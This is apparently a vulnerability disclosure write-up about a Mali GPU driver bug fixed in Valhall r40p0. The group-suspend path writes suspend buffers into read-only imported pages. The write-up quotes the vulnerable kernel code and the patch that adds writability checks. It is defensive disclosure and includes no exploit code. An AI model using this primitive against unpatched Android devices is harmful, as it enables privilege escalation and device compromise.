Disclosure or Patch Date: Get patched in Valhall r40p0 on the 7th October 2022
Product: Arm Mali GPU driver for Linux/Android
Advisory:
from Arm (upstream): https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities
Affected Versions: see Arm advisory
First Patched Version: Valhall r40p0
Bug class: Broken access control logic
Vulnerability details:
There is an ioctl command KBASE_IOCTL_KCPU_QUEUE_ENQUEUE
in the ioctl of mali driver:
case KBASE_IOCTL_KCPU_QUEUE_ENQUEUE:
KBASE_HANDLE_IOCTL_IN(KBASE_IOCTL_KCPU_QUEUE_ENQUEUE,
kbasep_kcpu_queue_enqueue,
struct kbase_ioctl_kcpu_queue_enqueue,
kctx);
break;
We can use the command KBASE_IOCTL_KCPU_QUEUE_ENQUEUE
to enqueue a command into the KCPU queue. For example, we can use KBASE_IOCTL_KCPU_QUEUE_ENQUEUE
to enqueue a queue command BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND
.
The queue command BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND
is processed with the function kbase_csf_kcpu_queue_enqueue
. In the function kbase_csf_kcpu_queue_enqueue
, the queue command BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND
will be processed first by function kbase_csf_queue_group_suspend_prepare
, and then it will be processed by the function kbase_csf_queue_group_suspend_process
.
First of all, let’s have a look at the function kbase_csf_queue_group_suspend_prepare
. The function kbase_csf_queue_group_suspend_prepare
will get ready the destination pages which will be used to copy the suspended buffers to.
static int kbase_csf_queue_group_suspend_prepare(
struct kbase_kcpu_command_queue *kcpu_queue,
struct base_kcpu_command_group_suspend_info *suspend_buf,
struct kbase_kcpu_command *current_command)
{
struct kbase_context *const kctx = kcpu_queue->kctx;
struct kbase_suspend_copy_buffer *sus_buf = NULL;
u64 addr = suspend_buf->buffer;
u64 page_addr = addr & PAGE_MASK;
u64 end_addr = addr + suspend_buf->size - 1;
u64 last_page_addr = end_addr & PAGE_MASK;
int nr_pages = (last_page_addr - page_addr) / PAGE_SIZE + 1;
int pinned_pages = 0, ret = 0;
struct kbase_va_region *reg;
lockdep_assert_held(&kctx->csf.kcpu_queues.lock);
if (suspend_buf->size <
kctx->kbdev->csf.global_iface.groups[0].suspend_size)
return -EINVAL;
ret = kbase_csf_queue_group_handle_is_valid(kctx,
suspend_buf->group_handle);
if (ret)
return ret;
sus_buf = kzalloc(sizeof(*sus_buf), GFP_KERNEL);
if (!sus_buf)
return -ENOMEM;
sus_buf->size = suspend_buf->size;
sus_buf->nr_pages = nr_pages;
sus_buf->offset = addr & ~PAGE_MASK;
sus_buf->pages = kcalloc(nr_pages, sizeof(struct page *), GFP_KERNEL);
if (!sus_buf->pages) {
ret = -ENOMEM;
goto out_clean_sus_buf;
}
/* Check if the page_addr is a valid GPU VA from SAME_VA zone,
* otherwise consider it is a CPU VA corresponding to the Host
* memory allocated by userspace.
*/
kbase_gpu_vm_lock(kctx);
reg = kbase_region_tracker_find_region_enclosing_address(kctx,
page_addr);
if (kbase_is_region_invalid_or_free(reg)) {
kbase_gpu_vm_unlock(kctx);
pinned_pages = get_user_pages_fast(page_addr, nr_pages, 1, //<--------- get the destination pages from user address directly!
sus_buf->pages);
kbase_gpu_vm_lock(kctx);
if (pinned_pages < 0) {
ret = pinned_pages;
goto out_clean_pages;
}
if (pinned_pages != nr_pages) {
ret = -EINVAL;
goto out_clean_pages;
}
} else {
struct tagged_addr *page_array;
u64 start, end, i;
if (!(reg->flags & BASE_MEM_SAME_VA) ||
reg->nr_pages < nr_pages ||
kbase_reg_current_backed_size(reg) !=
reg->nr_pages) {
ret = -EINVAL;
goto out_clean_pages;
}
start = PFN_DOWN(page_addr) - reg->start_pfn;
end = start + nr_pages;
if (end > reg->nr_pages) {
ret = -EINVAL;
goto out_clean_pages;
}
sus_buf->cpu_alloc = kbase_mem_phy_alloc_get(reg->cpu_alloc);
kbase_mem_phy_alloc_kernel_mapped(reg->cpu_alloc);
page_array = kbase_get_cpu_phy_pages(reg); //<------------------- get the destination pages from a valid region !!!
page_array += start;
for (i = 0; i < nr_pages; i++, page_array++)
sus_buf->pages[i] = as_page(*page_array); //<------------ the destination pages get stored in the "sus_buf->pages"
}
kbase_gpu_vm_unlock(kctx);
current_command->type = BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND;
current_command->info.suspend_buf_copy.sus_buf = sus_buf;
current_command->info.suspend_buf_copy.group_handle =
suspend_buf->group_handle;
return ret;
out_clean_pages:
kbase_gpu_vm_unlock(kctx);
kfree(sus_buf->pages);
out_clean_sus_buf:
kfree(sus_buf);
return ret;
}
As you can see, the destination pages will be stored in the array sus_buf->pages
. It’s really interesting that there are two ways we can get the destination pages ready. The very first way is to get the destination pages from the user address directly with the kernel API get_user_pages_fast
. The second way is to get the destination pages from a valid region. Let’s pay attention to the second way.
We know that a region can be created by many methods corresponding to different ioctl commands. What if there is a region that is created by the ioctl command KBASE_IOCTL_MEM_IMPORT
? We all know that with the KBASE_IOCTL_MEM_IMPORT
, we can create a region by importing some user pages and these user pages will become the pages of the region. What’s more, we can actually create a region by importing some read-only user pages with the command KBASE_IOCTL_MEM_IMPORT
. As a result, we can get a region in which the pages are read-only.
Let’s get back to the function kbase_csf_queue_group_suspend_prepare
. You can see there are no checks to make sure the pages gotten from a valid region is writable on CPU side. So some read-only pages can be stored into the sus_buf->pages
!!!
Ever since the pages in the sus_buf->pages
are read-only, the writing to read-only pages will happen in the function kbase_csf_scheduler_group_copy_suspend_buf
when copying the suspend buffers:
int kbase_csf_scheduler_group_copy_suspend_buf(struct kbase_queue_group *group,
struct kbase_suspend_copy_buffer *sus_buf)
{
struct kbase_context *const kctx = group->kctx;
struct kbase_device *const kbdev = kctx->kbdev;
struct kbase_csf_scheduler *const scheduler = &kbdev->csf.scheduler;
int err = 0;
kbase_reset_gpu_assert_prevented(kbdev);
lockdep_assert_held(&kctx->csf.lock);
mutex_lock(&scheduler->lock);
if (kbasep_csf_scheduler_group_is_on_slot_locked(group)) {
DECLARE_BITMAP(slot_mask, MAX_SUPPORTED_CSGS) = {0};
set_bit(kbase_csf_scheduler_group_get_slot(group), slot_mask);
if (!WARN_ON(scheduler->state == SCHED_SUSPENDED))
suspend_queue_group(group);
err = wait_csg_slots_suspend(kbdev, slot_mask,
kbdev->csf.fw_timeout_ms);
if (err) {
dev_warn(kbdev->dev, "[%llu] Timeout waiting for the group %d to suspend on slot %d",
kbase_backend_get_cycle_cnt(kbdev),
group->handle, group->csg_nr);
goto exit;
}
}
if (queue_group_suspended_locked(group)) {
unsigned int target_page_nr = 0, i = 0;
u64 offset = sus_buf->offset;
size_t to_copy = sus_buf->size;
if (scheduler->state != SCHED_SUSPENDED) {
/* Similar to the case of HW counters, need to flush
* the GPU cache before reading from the suspend buffer
* pages as they are mapped and cached on GPU side.
*/
kbase_gpu_start_cache_clean(kbdev);
kbase_gpu_wait_cache_clean(kbdev);
} else {
/* Make sure power down transitions have completed,
* i.e. L2 has been powered off as that would ensure
* its contents are flushed to memory.
* This is needed as Scheduler doesn't wait for the
* power down to finish.
*/
kbase_pm_wait_for_desired_state(kbdev);
}
for (i = 0; i < PFN_UP(sus_buf->size) &&
target_page_nr < sus_buf->nr_pages; i++) {
struct page *pg =
as_page(group->normal_suspend_buf.phy[i]);
void *sus_page = kmap(pg);
if (sus_page) {
kbase_sync_single_for_cpu(kbdev,
kbase_dma_addr(pg),
PAGE_SIZE, DMA_BIDIRECTIONAL);
err = kbase_mem_copy_to_pinned_user_pages( //<---------------- write read-only memory pages will happen here !!!!!
sus_buf->pages, sus_page,
&to_copy, sus_buf->nr_pages,
&target_page_nr, offset);
kunmap(pg);
if (err)
break;
} else {
err = -ENOMEM;
break;
}
}
schedule_in_cycle(group, false);
} else {
/* If addr-space fault, the group may have been evicted */
err = -EIO;
}
exit:
mutex_unlock(&scheduler->lock);
return err;
}
The issue has been fixed in the latest Vallhal driver r40p0. The patch is like this:
@@ -669,9 +671,12 @@ static int kbase_csf_queue_group_suspend_prepare(
u64 start, end, i;
if (((reg->flags & KBASE_REG_ZONE_MASK) != KBASE_REG_ZONE_SAME_VA) ||
- reg->nr_pages < nr_pages ||
- kbase_reg_current_backed_size(reg) !=
- reg->nr_pages) {
+ (kbase_reg_current_backed_size(reg) < nr_pages) ||
+ !(reg->flags & KBASE_REG_CPU_WR) ||
+ (reg->gpu_alloc->type != KBASE_MEM_TYPE_NATIVE) ||
+ (reg->flags & KBASE_REG_DONT_NEED) ||
+ (reg->flags & KBASE_REG_ACTIVE_JIT_ALLOC) ||
+ (reg->flags & KBASE_REG_NO_USER_FREE)) {
ret = -EINVAL;
goto out_clean_pages;
}
As you can see that the reg->flags
has been checked to make sure the region writable.
Variant analysis and code auditing.
Jann Horn from Google Project Zero has made some great work in finding similar vulnerabilities which make read-only imported pages host-writable in the Mali GPU driver. In the report:https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-39793.html, Jann Horn disclosed details of the CVE-2022-22706, CVE-2021-28664, and CVE-2021-44828. All these three vulnerabilities are able to make read-only imported pages host-writable.
After analyzing the report thoroughly, It occurred to me that maybe there are more similar vulnerabilities in Mali driver? After a long time of reading the source code, I finally found this issue, just like the other similar vulnerabilities, this one can also make read-only imported pages host-writable!